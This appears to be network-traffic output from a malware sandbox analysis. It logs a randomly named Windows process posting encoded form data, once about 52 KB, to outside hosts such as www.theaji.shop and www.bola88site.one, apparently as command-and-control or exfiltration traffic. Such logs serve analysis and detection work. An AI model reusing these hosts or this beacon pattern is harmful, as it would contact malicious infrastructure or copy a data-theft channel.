                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:48:34.229645967 CEST1125OUTPOST /q3za/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.theaji.shop
                                                                                  Origin: http://www.theaji.shop
                                                                                  Referer: http://www.theaji.shop/q3za/
                                                                                  Content-Length: 545
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 63 55 50 67 4f 34 30 69 75 4c 7a 6d 74 30 68 6d 76 70 38 72 31 65 68 31 31 59 47 78 48 75 6d 35 61 78 58 38 79 44 73 6e 4c 77 34 45 63 4d 6e 77 78 2b 54 31 5a 50 35 72 76 6c 59 42 6d 49 32 70 71 6f 52 6f 30 5a 59 65 77 4e 59 31 52 65 6b 54 67 70 49 7a 78 67 5a 46 58 4c 6e 32 65 4d 57 74 6a 49 71 58 65 52 74 2f 4c 36 75 6f 5a 4a 37 58 42 49 7a 66 43 4b 75 44 33 44 58 79 76 53 32 77 61 31 71 47 67 30 55 58 65 6c 6f 6c 5a 50 50 4d 56 69 6d 79 74 62 75 62 47 33 67 55 34 30 65 72 71 6e 49 45 62 5a 48 59 45 65 6d 71 41 2b 43 36 6b 6d 36 57 76 36 39 57 4b 67 4f 38 6f 31 6d 4b 6f 68 7a 37 4e 74 69 50 6c 77 73 50 4c 4d 72 7a 50 58 79 59 59 69 5a 4e 6e 62 33 75 34 4a 4e 4a 51 48 31 64 42 45 64 64 51 67 35 6d 30 61 57 6d 72 79 31 57 55 37 33 55 6e 52 77 64 73 69 4a 32 64 2f 2b 32 46 31 56 72 67 31 42 54 4e 59 70 73 4c 66 4a 4f 32 53 47 66 47 33 32 68 30 70 56 2b 66 35 79 44 62 5a 4d 6e 5a 48 6b 38 63 55 4f 54 62 36 4d 42 57 61 49 68 76 4d 56 76 48 49 31 72 4f 59 43 66 6b 36 74 56 54 [TRUNCATED]
                                                                                  Data Ascii: AvLLLbOh=cUPgO40iuLzmt0hmvp8r1eh11YGxHum5axX8yDsnLw4EcMnwx+T1ZP5rvlYBmI2pqoRo0ZYewNY1RekTgpIzxgZFXLn2eMWtjIqXeRt/L6uoZJ7XBIzfCKuD3DXyvS2wa1qGg0UXelolZPPMVimytbubG3gU40erqnIEbZHYEemqA+C6km6Wv69WKgO8o1mKohz7NtiPlwsPLMrzPXyYYiZNnb3u4JNJQH1dBEddQg5m0aWmry1WU73UnRwdsiJ2d/+2F1Vrg1BTNYpsLfJO2SGfG32h0pV+f5yDbZMnZHk8cUOTb6MBWaIhvMVvHI1rOYCfk6tVTfUbxXQIT0JywuaWu2LtsbRlOlDtwG42CU8BUWh7ZpFHukbv78TGbXXSM8WJs8KEQSoXINb4TGFateT6TIpV8o2/1Gci2ogQmFFuzambWvYQXmwYvE/sHgaxzJF6Lm2lP2OCiDUEtipvPjnVRnuM0JmqkaBPPNYEFR5AC2BgThSgSDGiRqluw0nGhYhfuu4TKzy32PoFM0MthNg=
                                                                                  Aug 27, 2024 17:48:34.331727028 CEST457INHTTP/1.1 404 Not Found
                                                                                  Date: Tue, 27 Aug 2024 15:48:34 GMT
                                                                                  Server: Apache/2.4.58 (Ubuntu)
                                                                                  Content-Length: 277
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 68 65 61 6a 69 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Ubuntu) Server at www.theaji.shop Port 80</address></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  28192.168.11.20498343.82.56.39805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:48:36.881314039 CEST1289OUTPOST /q3za/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.theaji.shop
                                                                                  Origin: http://www.theaji.shop
                                                                                  Referer: http://www.theaji.shop/q3za/
                                                                                  Content-Length: 52933
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 63 55 50 67 4f 34 30 69 75 4c 7a 6d 74 30 68 6d 76 70 38 72 31 65 68 31 31 59 47 78 48 75 6d 35 61 78 58 38 79 44 73 6e 4c 77 77 45 64 2f 66 77 78 64 72 31 61 50 35 72 78 56 59 45 6d 49 32 30 71 6f 4a 73 30 5a 55 6f 77 50 77 31 52 4e 73 54 68 62 51 7a 30 67 5a 47 4f 37 6e 30 56 73 57 35 6a 49 75 44 65 52 6f 45 49 4b 61 6f 66 36 6a 58 46 35 7a 63 64 71 76 47 33 44 58 2b 6c 79 32 43 61 30 36 57 67 30 51 58 65 6a 77 6c 62 39 33 4d 57 7a 6d 79 67 72 75 45 4d 58 67 66 32 6b 65 43 71 6e 4d 51 62 5a 47 74 45 66 69 71 41 35 4f 36 6e 68 75 4a 68 36 39 57 43 41 4f 2f 73 31 69 77 6f 68 48 5a 4e 74 57 50 6c 79 73 50 49 73 72 7a 45 57 79 66 4d 53 5a 50 77 37 33 35 38 4a 42 37 51 45 4a 6a 42 46 35 64 51 55 5a 6d 33 4a 4f 6d 70 54 31 57 55 62 33 57 6f 78 77 77 6d 43 4a 71 64 2f 76 4b 46 78 5a 52 67 33 4e 54 4d 39 56 73 64 75 4a 50 79 79 47 52 49 58 32 77 77 70 52 36 66 39 65 66 62 5a 4e 71 5a 47 51 38 63 67 79 54 61 37 4d 47 58 71 49 71 6e 73 56 2b 4f 6f 70 6c 4f 5a 75 48 6b 36 6b 4f 54 [TRUNCATED]
                                                                                  Data Ascii: AvLLLbOh=cUPgO40iuLzmt0hmvp8r1eh11YGxHum5axX8yDsnLwwEd/fwxdr1aP5rxVYEmI20qoJs0ZUowPw1RNsThbQz0gZGO7n0VsW5jIuDeRoEIKaof6jXF5zcdqvG3DX+ly2Ca06Wg0QXejwlb93MWzmygruEMXgf2keCqnMQbZGtEfiqA5O6nhuJh69WCAO/s1iwohHZNtWPlysPIsrzEWyfMSZPw7358JB7QEJjBF5dQUZm3JOmpT1WUb3WoxwwmCJqd/vKFxZRg3NTM9VsduJPyyGRIX2wwpR6f9efbZNqZGQ8cgyTa7MGXqIqnsV+OoplOZuHk6kOTc4bx3QIXnh9/ubchWLFm7RUOl+MwCgACkQBVmx7d5FYlkaoxcTAfXXSM8Kzs8GETjQXSa/4WVtaveTwTIpA8o6U1GVB2pRFmDVuyP6bbNgTd2wBlk/FYwemzNtiLmmfPEKCjDkEpipsEjnSZHuawJq2kaNlPOEUFT5ACH17LDGDWF/rNYdZnk/Vjv9riOcqJmCv48IUXmkRw6f0S11CQTC4wYJ80nK67ww2kMrAe1UoyMiCFbkCrG0PD//uqA9QOgO4Cc4tHt1CISKh+fQd2O7/U1u8KjziSYFg3BjL73wdVLD8ADrHRY+GhhCmI8nFG07GCXezEdr9KnEMGIYyPCncSbQDfmialnBNh7cbHcaILkoK5U
                                                                                  Aug 27, 2024 17:48:36.881349087 CEST5156OUTData Raw: 30 70 58 6d 66 36 58 48 42 73 58 50 33 66 4f 4a 30 58 43 53 6b 59 64 56 6f 56 37 73 44 47 2b 4b 58 7a 50 52 36 2b 4b 5a 6b 47 61 70 37 35 46 6a 52 36 6c 78 32 65 6f 52 2f 55 6f 7a 4e 56 31 7a 70 32 42 45 32 42 6f 77 4e 5a 49 41 50 77 6c 51 38 45
                                                                                  Data Ascii: 0pXmf6XHBsXP3fOJ0XCSkYdVoV7sDG+KXzPR6+KZkGap75FjR6lx2eoR/UozNV1zp2BE2BowNZIAPwlQ8EC8Q2fDDEIrvzCJ2tkrjKacr2M9jYc9I96Oh8bBbI5yWVScgNLXAbbx1CIiJQL0eZHZJc3C818lbcFXe5cfDDXGJECL+Vw/OWsXoPZ56OWHCA0zwlHukvSiHFkVpwXWhWZ3eS+qVpSPkPpN1205uJDpS5U3VyyqyFC
                                                                                  Aug 27, 2024 17:48:36.881406069 CEST6445OUTData Raw: 4c 61 41 45 52 41 64 4e 31 69 4d 34 32 65 75 74 41 4c 6a 6f 2b 42 35 5a 37 62 6d 2f 2f 2b 50 4e 67 63 61 32 4d 7a 79 79 54 52 35 53 6f 4a 71 6c 4c 38 32 48 66 42 70 4e 38 44 72 74 46 6d 44 55 53 61 7a 68 78 66 37 45 6d 44 64 32 4b 39 65 51 38 69
                                                                                  Data Ascii: LaAERAdN1iM42eutALjo+B5Z7bm//+PNgca2MzyyTR5SoJqlL82HfBpN8DrtFmDUSazhxf7EmDd2K9eQ8iSgitovM96PzLdaodHT44H9x9ijm9fdFV8yZfJYOHl2CFprO9tl6e5ATF8VlWJuYL25E7DF8r53aBsYC17GaCUOOVKbF8p2/s21mWvAkZUFo/uQn7Hr3o55R8h4b/97PJYcOdP1phXtSQsCVuakm+50b8ztPkuIpCm
                                                                                  Aug 27, 2024 17:48:36.983232021 CEST1289OUTData Raw: 65 77 30 67 71 48 6f 34 49 49 69 2f 31 51 48 67 69 4b 72 6c 36 48 4c 78 6c 2f 4e 48 35 71 33 68 48 65 71 30 61 56 48 70 7a 2b 66 4e 47 58 74 56 52 6a 44 77 4f 2f 78 73 44 72 4a 78 2f 6e 31 6f 46 33 4a 35 6b 41 31 72 67 76 78 4a 4e 36 52 56 61 50
                                                                                  Data Ascii: ew0gqHo4IIi/1QHgiKrl6HLxl/NH5q3hHeq0aVHpz+fNGXtVRjDwO/xsDrJx/n1oF3J5kA1rgvxJN6RVaPremXm6xabJ6Zk0AVFezwNplIy9XQOaeghSahR6jKg4WKLcxKbNJxnjHJLBF2/tpbaaK7+a+mlsRfb/IwRPqHy05Gv9Bp9kT70BpUBVJKXbx3647u5sj3ehRCUG34wkVFWT6kJo7wA0mJj6A+P1g625Lmp9PUdfRYO
                                                                                  Aug 27, 2024 17:48:36.983318090 CEST6445OUTData Raw: 54 63 51 34 34 5a 6f 33 34 68 6c 44 4a 38 71 42 79 71 4c 6d 64 34 6b 33 6d 53 7a 65 6e 56 43 61 61 6d 34 6b 6d 71 50 6a 4c 77 64 58 35 48 66 49 59 6a 4a 6f 2f 4d 44 4c 54 64 63 56 37 73 6a 34 36 6e 65 56 63 74 6f 34 52 30 58 6d 34 68 4f 4f 49 54
                                                                                  Data Ascii: TcQ44Zo34hlDJ8qByqLmd4k3mSzenVCaam4kmqPjLwdX5HfIYjJo/MDLTdcV7sj46neVcto4R0Xm4hOOITxkTYvuBk62A0I47yGiOplfE3Rn8Uhzu4iz7JWq0dJM6YHMZub960zzCrAx1WV5r5rpaiOzU2jP3t5PTZ+S0O7GaUUsmbYt/5vOTaBvMATcK1RB5z4mtIv5glJbWnaiOLmJFloctDmnKqdEJUc++rIdyMu+w3TCnGJ
                                                                                  Aug 27, 2024 17:48:36.983366013 CEST2578OUTData Raw: 73 79 31 56 66 78 4e 71 77 2f 46 48 59 71 71 4f 35 7a 61 31 2f 76 4f 39 6f 38 64 2f 30 72 78 30 4b 74 5a 73 4c 4b 5a 30 41 50 31 4f 71 78 44 41 47 43 36 54 51 36 31 57 48 7a 61 46 6b 59 4c 6b 67 77 65 66 59 73 77 6b 39 53 4c 47 51 46 6e 68 47 64
                                                                                  Data Ascii: sy1VfxNqw/FHYqqO5za1/vO9o8d/0rx0KtZsLKZ0AP1OqxDAGC6TQ61WHzaFkYLkgwefYswk9SLGQFnhGdRqC18OyRYrr03bDs+tEz63sWUSvxuLqq/NVqjRBATHKMiUwroPHOYsq+UhwGiZhPbWPgyv7+WiLckBjw+QyA9wkfJNjl23xollwKq27sZVxjGXTfkmhbMid7oqu94r51ZkLK18TEOIl1d4K2VkT4s9IpJ+jpNaFWJ
                                                                                  Aug 27, 2024 17:48:36.983536005 CEST12890OUTData Raw: 44 6d 5a 59 56 62 37 4d 2f 33 2b 56 6b 77 6e 58 58 38 75 30 6b 35 6d 53 61 70 72 68 37 39 57 36 4b 64 56 72 50 63 74 36 35 77 63 46 69 6d 5a 36 49 43 43 57 7a 35 7a 4c 4d 44 43 36 44 61 48 75 31 48 34 51 47 35 56 67 37 7a 67 33 55 62 56 52 57 31
                                                                                  Data Ascii: DmZYVb7M/3+VkwnXX8u0k5mSaprh79W6KdVrPct65wcFimZ6ICCWz5zLMDC6DaHu1H4QG5Vg7zg3UbVRW1QStYO8UAJuYJ3hwL8ks7RuqCE4jNwyBBFl0fNtifBkLn/fAnDdsW9vFDd//yTY8+JDV0v7JhJt4O9agtVJ+0rrDLPjPxOfDEidvUFHety9E9ThK55lPvLkEobzoAmriQqH/KvXZf9d3skbETRXB14CxDZ38Ke+tTn
                                                                                  Aug 27, 2024 17:48:37.086987972 CEST1289OUTData Raw: 62 38 34 36 45 4a 61 30 66 4e 46 2b 34 33 2f 61 63 6f 32 7a 4b 45 66 70 2b 36 6e 49 43 53 39 4f 6a 68 76 4a 4e 56 77 4d 62 48 31 4b 4f 73 78 30 79 6a 6b 32 4d 77 46 36 7a 30 57 49 7a 30 37 6f 77 41 2b 52 32 63 70 49 6e 4d 2b 51 71 4c 69 2f 70 65
                                                                                  Data Ascii: b846EJa0fNF+43/aco2zKEfp+6nICS9OjhvJNVwMbH1KOsx0yjk2MwF6z0WIz07owA+R2cpInM+QqLi/peazIwoIVIWn3wHW9IsWLg6O2On70M5rt9grtjvHkoRL5eaot4eEiVGQ8i4iUs5bljXUfRhhizTMRGSFzd3kXgmBNuWFtRdXI4qwbh7+rc5xivSfS9k45mB+YAb31R+Uglm7DJMc3NlmMKeOoGOQRiKCekLzlS5P5av
                                                                                  Aug 27, 2024 17:48:37.087038994 CEST5156OUTData Raw: 42 67 4f 6c 44 48 48 4f 31 46 36 72 39 67 30 62 4c 2b 69 46 2b 44 57 63 6c 32 48 2b 43 62 65 61 58 55 56 7a 77 52 41 35 62 51 78 57 4e 32 46 32 7a 70 4f 66 32 32 4c 6c 6c 38 66 4e 42 53 37 73 30 65 4b 6e 42 4e 56 50 76 53 54 4a 45 4a 76 6c 63 53
                                                                                  Data Ascii: BgOlDHHO1F6r9g0bL+iF+DWcl2H+CbeaXUVzwRA5bQxWN2F2zpOf22Lll8fNBS7s0eKnBNVPvSTJEJvlcSAXxyQ6ZoL3YJSYztGYsFgHomVGsVWEkU77WXGsxXBvr86VqlvHv4MVoiTRRFPi7NnNu9zNJoYa5G01gkq8ZRlaeCjYdMvhaExWpM9HLkSU9xsjkuVccBDdkkbN952Nt2ciL7vMdPySO5QJb06QJWy07S0Xrjy0kki
                                                                                  Aug 27, 2024 17:48:37.087256908 CEST10985OUTData Raw: 42 36 4a 62 6c 4c 71 43 6c 51 47 34 67 74 4d 76 76 6b 35 5a 6c 43 73 46 58 6e 33 6f 50 4a 5a 4b 6f 6e 49 54 57 75 69 68 37 70 31 58 70 42 74 2b 38 64 34 49 4b 67 36 61 4a 67 35 43 33 4f 59 66 6b 55 68 30 67 6d 42 62 48 72 5a 76 6a 33 39 68 69 69
                                                                                  Data Ascii: B6JblLqClQG4gtMvvk5ZlCsFXn3oPJZKonITWuih7p1XpBt+8d4IKg6aJg5C3OYfkUh0gmBbHrZvj39hiihIGX4MJ7Jhu/J9iL8vhPvEtdhe8Mdwooi+ehjYIy5GijzFdKONBEw4uJoNxgxWSCQwVttCj55lJySG5/PPNIbIrcVFJr+Niki5eesxWzwGyM0qD/ZrDx81d+Xa7mYjPiCBxofQI/KMWfUEi4cxo827O8CDircume7
                                                                                  Aug 27, 2024 17:48:37.197104931 CEST457INHTTP/1.1 404 Not Found
                                                                                  Date: Tue, 27 Aug 2024 15:48:36 GMT
                                                                                  Server: Apache/2.4.58 (Ubuntu)
                                                                                  Content-Length: 277
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 68 65 61 6a 69 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Ubuntu) Server at www.theaji.shop Port 80</address></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  29192.168.11.20498353.82.56.39805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:48:39.522396088 CEST524OUTGET /q3za/?AvLLLbOh=RWnANPBTnIHygAxj+74p2fQt/r+QMu+ZbRPK+z1nLy5TPZ7mlunYNOVzlFQ68L6IsvBO8bEu8tkdQ9B+wYsoyn5BHOSzYZ2Hj+i3Yz8xBJ+jGbXNJ7HrFvE=&7RB=66nPyLG8 HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Host: www.theaji.shop
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Aug 27, 2024 17:48:39.624238968 CEST457INHTTP/1.1 404 Not Found
                                                                                  Date: Tue, 27 Aug 2024 15:48:39 GMT
                                                                                  Server: Apache/2.4.58 (Ubuntu)
                                                                                  Content-Length: 277
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 68 65 61 6a 69 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Ubuntu) Server at www.theaji.shop Port 80</address></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  30192.168.11.2049836172.96.191.39805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:48:45.206881046 CEST794OUTPOST /frol/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.bola88site.one
                                                                                  Origin: http://www.bola88site.one
                                                                                  Referer: http://www.bola88site.one/frol/
                                                                                  Content-Length: 205
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 56 50 32 7a 47 4f 41 36 71 70 6d 51 7a 6e 75 39 61 59 4b 79 51 50 46 6c 43 4a 74 78 34 46 61 64 48 78 65 2b 75 76 52 59 6a 77 70 54 71 37 75 4c 48 35 43 61 75 6c 54 62 72 38 30 66 6f 31 73 52 59 37 67 2f 6a 47 41 62 4e 72 43 6a 35 4c 48 5a 31 4f 72 46 75 30 76 58 41 50 6f 56 33 42 34 45 70 78 2b 7a 46 38 65 69 33 61 46 52 7a 6f 71 6b 63 72 5a 61 30 4e 6a 4e 6f 79 66 75 4f 58 2b 42 49 54 79 35 6c 6c 70 6e 56 6b 6a 34 43 78 4d 47 69 4c 31 73 54 6d 2b 59 54 4f 52 4e 36 36 50 52 6d 6c 55 66 44 4d 56 52 62 57 49 35 2b 57 67 75 37 56 6a 41 30 69 4a 39 67 54 6b 2b 68 69 72 6d 42 51 3d 3d
                                                                                  Data Ascii: AvLLLbOh=VP2zGOA6qpmQznu9aYKyQPFlCJtx4FadHxe+uvRYjwpTq7uLH5CaulTbr80fo1sRY7g/jGAbNrCj5LHZ1OrFu0vXAPoV3B4Epx+zF8ei3aFRzoqkcrZa0NjNoyfuOX+BITy5llpnVkj4CxMGiL1sTm+YTORN66PRmlUfDMVRbWI5+Wgu7VjA0iJ9gTk+hirmBQ==
                                                                                  Aug 27, 2024 17:48:45.539205074 CEST1033INHTTP/1.1 404 Not Found
                                                                                  Connection: close
                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                  pragma: no-cache
                                                                                  content-type: text/html
                                                                                  content-length: 796
                                                                                  date: Tue, 27 Aug 2024 15:48:45 GMT
                                                                                  server: LiteSpeed
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  31192.168.11.2049837172.96.191.39805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:48:48.061391115 CEST1134OUTPOST /frol/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.bola88site.one
                                                                                  Origin: http://www.bola88site.one
                                                                                  Referer: http://www.bola88site.one/frol/
                                                                                  Content-Length: 545
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
